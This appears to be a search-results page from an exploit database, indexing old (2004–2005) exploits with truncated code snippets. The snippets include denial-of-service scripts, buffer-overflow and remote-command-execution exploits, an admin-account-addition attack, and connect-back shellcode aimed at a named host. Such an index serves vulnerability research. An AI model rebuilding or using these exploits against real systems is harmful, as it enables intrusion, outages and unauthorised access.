Lucene search
+L

192 matches found

exploitpack
exploitpack
added 2005/02/07 12:00 a.m.15 views

Foxmail 2.0 - MAIL FROM: Denial of Service

Foxmail 2.0 - MAIL FROM: Denial of Service !/usr/bin/python Code by OYXin oyxinatsegfault.cn import socket import sys import getopt def usage: print "Usage: foxserver.py -h host -p port" sys.exit0 if name == 'main': try: opts, args = getopt.getoptsys.argv1:, "h:p:" except getopt.GetoptError, msg:...

0.3AI score
SaveExploits0
zdt
zdt
added 2005/02/07 12:00 a.m.32 views

Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit

Exploit for unknown platform in category dos / poc ================================================== Foxmail 2.0 MAIL FROM: Denial of Service Exploit ================================================== !/usr/bin/python Code by OYXin oyxinatsegfault.cn import socket import sys import getopt def...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2005/02/07 12:00 a.m.18 views

Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit

No description provided by source. !/usr/bin/python Code by OYXin oyxinatsegfault.cn import socket import sys import getopt def usage: print "Usage: foxserver.py -h host -p port" sys.exit0 if name == 'main': try: opts, args = getopt.getoptsys.argv1:, "h:p:" except getopt.GetoptError, msg: print m...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2005/02/01 12:00 a.m.49 views

Savant Web Server 3.1 - Remote Buffer Overflow (1)

Savant web server Buffer Overflow Exploit Discovered by : Mati Aharoni Coded by : Tal Zeltzer and Mati Aharoni www.see-security.com FOR RESEACRH PURPOSES ONLY! import struct import socket sc = "\x90" 21 win32adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub...

7.5CVSS5.8AI score0.05437EPSS
SaveExploits4
Packet Storm
Packet Storm
added 2005/01/27 12:00 a.m.31 views

siteman.noam.txt

!/usr/bin/perl -w Exploit by Noam Rathaus - Beyond Security Ltd. Exploit for the SiteMan vulnerability discovered by: "amironline452" use Digest::MD5 qwmd5 md5hex md5base64; use IO::Socket; use strict; ./siteman.pl / vulnerable.host my $Path = shift; my $Host = shift; my $Username = shift; my...

7.4AI score
SaveExploits0
exploitpack
exploitpack
added 2005/01/25 12:00 a.m.20 views

AWStats 6.0 6.2 - configdir Remote Command Execution (Perl)

AWStats 6.0 6.2 - configdir Remote Command Execution Perl !/usr/bin/perl ---GHC--------------------------------- Remote command execution exploit Product: Advanced Web Statistics 6.0 - 6.2 URL:http://awstats.sourceforge.net Greets & respects to our friends: 1dt.w0lf and all rst.void.ru Special...

SaveExploits0
exploitpack
exploitpack
added 2005/01/25 12:00 a.m.18 views

Siteman 1.1.10 - Remote Administrative Account Addition

Siteman 1.1.10 - Remote Administrative Account Addition !/usr/bin/perl -w Exploit by Noam Rathaus - Beyond Security Ltd. Exploit for the SiteMan vulnerability discovered by: "amironline452" use Digest::MD5 qwmd5 md5hex md5base64; use IO::Socket; use strict; ./siteman.pl / vulnerable.host my $Path...

0.4AI score
SaveExploits0
zdt
zdt
added 2004/12/05 12:00 a.m.51 views

phpBB v1.0.0 - 2.0.10 admin_cash.php remote exploit

Exploit for unknown platform in category web applications =================================================== phpBB v1.0.0 - 2.0.10 admincash.php remote exploit =================================================== / exploit for phpBB 1.0.0 - 2.0.10 edit the b4b0.php file with the correct url to yo...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/26 12:00 a.m.16 views

linux/x86 connect 120 bytes

No description provided by source. / Connecting shellcode written by lamagra [email protected] http://lamagra.seKure.de May 2000 .file "connect" .version "01.01" .text .align 4 start: socketAFINET,SOCKSTREAM,IPPROTOIP; movl %esp,%ebp xorl %edx,%edx movb $102,%edx movl %edx,%eax 102 = socketcall...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/26 12:00 a.m.33 views

bsd/x86 - connect 93 bytes

bsd/x86 connect 93 bytes. Shellcode exploit for bsdx86 platform / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id rus-sec /EFnet rootteam.host.sk BITS 32 jmp short path main: po...

7.4AI score
SaveExploits0
zdt
zdt
added 2004/08/31 12:00 a.m.21 views

CesarFTP Server Long Command Denial of Service Exploit

Exploit for unknown platform in category dos / poc ====================================================== CesarFTP Server Long Command Denial of Service Exploit ====================================================== / -----------------------------------------------------------------------...

7AI score
SaveExploits0
exploitpack
exploitpack
added 2004/08/31 12:00 a.m.26 views

CesarFTP Server - Long Command Denial of Service

CesarFTP Server - Long Command Denial of Service / ----------------------------------------------------------------------- cesarftp.c - Cesar FTP Server Long Command DoS Exploit Copyright C 2000-2004 HUC All Rights Reserved. Author : lion : [email protected] : http://www.cnhonker.com Date :...

7.4AI score
SaveExploits0
seebug.org
seebug.org
added 2004/08/31 12:00 a.m.25 views

WFTPD Pro Server 3.21 MLST Remote Denial of Service Exploit

No description provided by source. / ----------------------------------------------------------------------- wftpd.c - WFTPD Pro Server 3.21 MLST DoS Exploit Copyright C 2000-2004 HUC All Rights Reserved. Author : lion : lion cnhonker net : www cnhonker com Date : 2004-08-30...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/08/26 12:00 a.m.55 views

Bird Chat 1.61 - Denial of Service

/ Bird Chat 1.61 - Denial Of Service - Proof Of Concept Coded by: Donato Ferrante / import java.net.Socket; import java.net.InetAddress; import java.net.ConnectException; import java.net.SocketTimeoutException; import java.io.OutputStream; import java.io.InputStream; public class BirdChat161DoSpo...

5CVSS5.8AI score0.0324EPSS
SaveExploits2
exploitpack
exploitpack
added 2004/07/24 12:00 a.m.15 views

Microsoft Windows SMS 2.0 - Denial of Service

Microsoft Windows SMS 2.0 - Denial of Service !/usr/bin/perl SMS DOS proof of concept and test code use Socket; use IO::Socket; if @ARGV != 1 print "usage: $0 \n"; exit; $host = shift@ARGV; $hexmsg =...

7.3AI score
SaveExploits0
zdt
zdt
added 2004/07/24 12:00 a.m.27 views

MS Windows SMS 2.0 Denial of Service Exploit

Exploit for unknown platform in category dos / poc ============================================ MS Windows SMS 2.0 Denial of Service Exploit ============================================ !/usr/bin/perl SMS DOS proof of concept and test code use Socket; use IO::Socket; if @ARGV != 1 print "usage: $...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/07/24 12:00 a.m.18 views

MS Windows SMS 2.0 Denial of Service Exploit

No description provided by source. !/usr/bin/perl SMS DOS proof of concept and test code use Socket; use IO::Socket; if @ARGV != 1 print "usage: $0 host or ip\n"; exit; $host = shift@ARGV; $hexmsg =...

7.1AI score
SaveExploits0
exploitpack
exploitpack
added 2004/07/20 12:00 a.m.42 views

OverByte ICS FTP Server - Remote Denial of Service

OverByte ICS FTP Server - Remote Denial of Service //--Exploit: //=========================================================== include include pragma commentlib, \"ws232.lib\" char Nonnullterminatedstring = \"AAAAAAAAAAAAAAAAAA\"; int mainint argc, char argv WSADATA wsaData; WORD...

0.2AI score
SaveExploits0
zdt
zdt
added 2004/07/20 12:00 a.m.30 views

OverByte ICS FTP Server Remote Denial of Service Exploit

Exploit for unknown platform in category dos / poc ======================================================== OverByte ICS FTP Server Remote Denial of Service Exploit ======================================================== --Exploit: //===========================================================...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/06/25 12:00 a.m.53 views

Rlpr 2.04 - 'msg()' Remote Format String

by jaguar !/usr/bin/python import os, sys, socket, struct, time, telnetlib class rlprd: fd = None pad = 2 00000000 31DB xor ebx,ebx 00000002 F7E3 mul ebx 00000004 B003 mov al,0x3 00000006 80C304 add bl,0x4 00000009 89E1 mov ecx,esp 0000000B 4A dec edx 0000000C CC int3 0000000D CD80 int 0x80...

10CVSS5.8AI score0.17427EPSS
SaveExploits3
Rows per page
Query Builder